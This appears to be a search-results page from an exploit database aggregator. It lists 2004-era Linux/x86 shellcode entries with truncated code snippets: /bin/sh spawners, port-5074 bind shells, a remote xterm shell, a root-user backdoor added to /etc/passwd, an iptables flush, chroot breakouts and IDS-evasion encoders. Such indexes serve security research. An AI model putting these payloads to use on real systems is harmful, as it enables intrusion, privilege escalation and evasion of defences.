Lucene search
+L

581 matches found

zdt
zdt
added 2004/09/26 12:00 a.m.20 views

linux/x86 iptables -F 45 bytes

Exploit for linux/x86 platform in category shellcode ============================== linux/x86 iptables -F 45 bytes ============================== / 06/03/2003 45 bytes to flush iptables. execve/sbin/iptables -F by UnboundeD greetz to s0t4ipv6. / char shellcode = "\x31\xd2" // xorl %edx,%edx "\x52...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/26 12:00 a.m.31 views

linux/x86 portbind port 5074 toupper 226 bytes

linux/x86 portbind port 5074 toupper 226 bytes. Shellcode exploit for linx86 platform / Bindshell puerto 5074 TOUPPER EVASION 226 bytes Bindshell original: Matias Sedalo 92 bytes La binshell esta codificada usando 2 bytes para representar 1 byte original de la siguiente forma: byte original: 0xAB...

SaveExploits0
zdt
zdt
added 2004/09/26 12:00 a.m.18 views

linux/x86 xterm -ut -display [IP]:0 132 bytes

Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 xterm -ut -display IP:0 132 bytes ============================================= / Linux/x86 execve of /usr/X11R6/bin/xterm -ut -display ip:0, exit 127.0.0.1 is an example, you must change ...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/26 12:00 a.m.17 views

linux/x86 shared memory exec 50 bytes

No description provided by source. / [email protected] - http://www.nopninjas.com Platform: Linux x86 Length: 50 bytes - This shellcode connects to the shared memory segment matching the key and executes the code at that address. xorl %edi,%edi xorl %esi,%esi xorl %edx,%edx movl $0xdeadbeef,%ec...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/26 12:00 a.m.34 views

linux/x86 - xterm -ut -display IP:0 132 bytes

linux/x86 xterm -ut -display IP:0 132 bytes. Shellcode exploit for linx86 platform / Linux/x86 execve of /usr/X11R6/bin/xterm -ut -display ip:0, exit 127.0.0.1 is an example, you must change it to a useful ip making a subrutine into the exploit? - you must not delete 'K' after ip:0 - / include ch...

0.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.68 views

linux/x86 execve /bin/sh 29 bytes

linux/x86 execve /bin/sh 29 bytes. Shellcode exploit for linx86 platform / c1999-2003 Shellcode Research http://www.shellcode.com.ar execve/bin/sh for linux x86 29 bytes by Matias Sedalo xorl %ebx, %ebx pushl %ebx leal 0x17%ebx,%eax int $0x80 cdq pushl $0x68732f6e pushl $0x69622f2f movl %esp, %eb...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:00 a.m.28 views

linux/x86 unix/SPARC execve /bin/sh 80 bytes

linux/x86 unix/SPARC execve /bin/sh 80 bytes. Shellcode exploits for multiple platform / Linux/x86 and Unix/Sparc execve of /bin/sh by dymitri!!! / include char wcode= "\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"...

0.3AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.15 views

linux/x86 execve /bin/sh setreuid(12 12) 50 bytes

No description provided by source. / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include stdio.h char c0de = / main: / / setregid12, 12; / "\x29\xc0" / subl %eax, %eax / "\xb0\x47" / movb $71, %al / "\x29\xdb" / subl %ebx, %ebx / / Here's...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.23 views

linux/x86 add user t00r 82 bytes

No description provided by source. / [email protected] 0x14abril0x7d2 82 bytes Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd Encriptada en http://www.shellcode.com.ar/linux/lnx-t00r-cr1.c / include stdio.h // Shellcode // Asm Code char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.13 views

linux/x86 execve /bin/sh tolower() evasion 41 bytes

No description provided by source. / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include stdio.h char c0de = / main: / "\xeb\x1b" / jmp callz / / start: / "\x5e" / popl %esi / "\x89\xf3" / movl %esi, %ebx / "\x89\xf7" / movl %esi, %edi / "\x83\xc7\x07" / addl $0x07,...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.36 views

linux/x86 execve /bin/sh encrypted 58 bytes

Exploit for linux/x86 platform in category shellcode =========================================== linux/x86 execve /bin/sh encrypted 58 bytes =========================================== / !!!!!! PRIVATE !!!!!!! // ANTI-IDS SHELLCODE // // !!!!!!!!!!!!!!!!!! // email protected 0x1d abril 0x7d2...

7AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.28 views

linux/x86 execve /bin/sh 38 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 38 bytes ================================= / email protected execve /bin/sh main char name2; name0="/bin/sh"; name1=NULL; execvename0,name,NULL; / include char shellcode= "\xeb\x18" //...

7AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.35 views

linux/x86 break chroot 46 bytes

Exploit for linux/x86 platform in category shellcode =============================== linux/x86 break chroot 46 bytes =============================== / The setuid0+chroot shellcode it will put '../' 10 times Size 46 bytes OS BSD /rootteam/dev0id www.sysworld.net email protected BITS 32 jmp short...

7AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.27 views

linux/x86 execve /bin/sh 24 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 24 bytes ================================= / email protected execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.13 views

linux/x86 execve /bin/sh 29 bytes

No description provided by source. / c1999-2003 Shellcode Research http://www.shellcode.com.ar execve/bin/sh for linux x86 29 bytes by Matias Sedalo xorl %ebx, %ebx pushl %ebx leal 0x17%ebx,%eax int $0x80 cdq pushl $0x68732f6e pushl $0x69622f2f movl %esp, %ebx pushl %eax pushl %ebx movl %esp, %ec...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.18 views

linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes

Exploit for multiple platform in category shellcode ================================================================ linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes ================================================================ / Shellcode ejecuta execve /bin/sh en Irix/mips,...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:00 a.m.36 views

linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes

No description provided by source. / Shellcode ejecuta execve /bin/sh en Irix/mips, Linux/x86, Unix/sparc by dymitr1 [email protected] / include stdio.h char code= "\x37\x37\xeb\x2f\x30\x80\x00\x12\x04\x10\xff\xff\x24\x02\x03\xf3\x23\xff\x02\x14\x23\xe4\xfe\x08"...

7.1AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.21 views

linux/x86 execve /bin/sh setreuid(12,12) 50 bytes

Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 execve /bin/sh setreuid12,12 50 bytes ================================================= / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12...

7AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.20 views

linux/x86 portbind port 5074 92 bytes

Exploit for linux/x86 platform in category shellcode ===================================== linux/x86 portbind port 5074 92 bytes ===================================== / email protected x86 portbind a shell in port 5074 92 bytes. / char shellcode = "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax...

7AI score
SaveExploits0
zdt
zdt
added 2004/09/12 12:00 a.m.18 views

linux/x86 break chroot 34 bytes

Exploit for linux/x86 platform in category shellcode =============================== linux/x86 break chroot 34 bytes =============================== / The setuid0+chroot shellcode. It is the one of the smallest shellcodes in the !!world!! it will put '../' 10 times Size 34 bytes OS BSD...

7AI score
SaveExploits0
Rows per page
Query Builder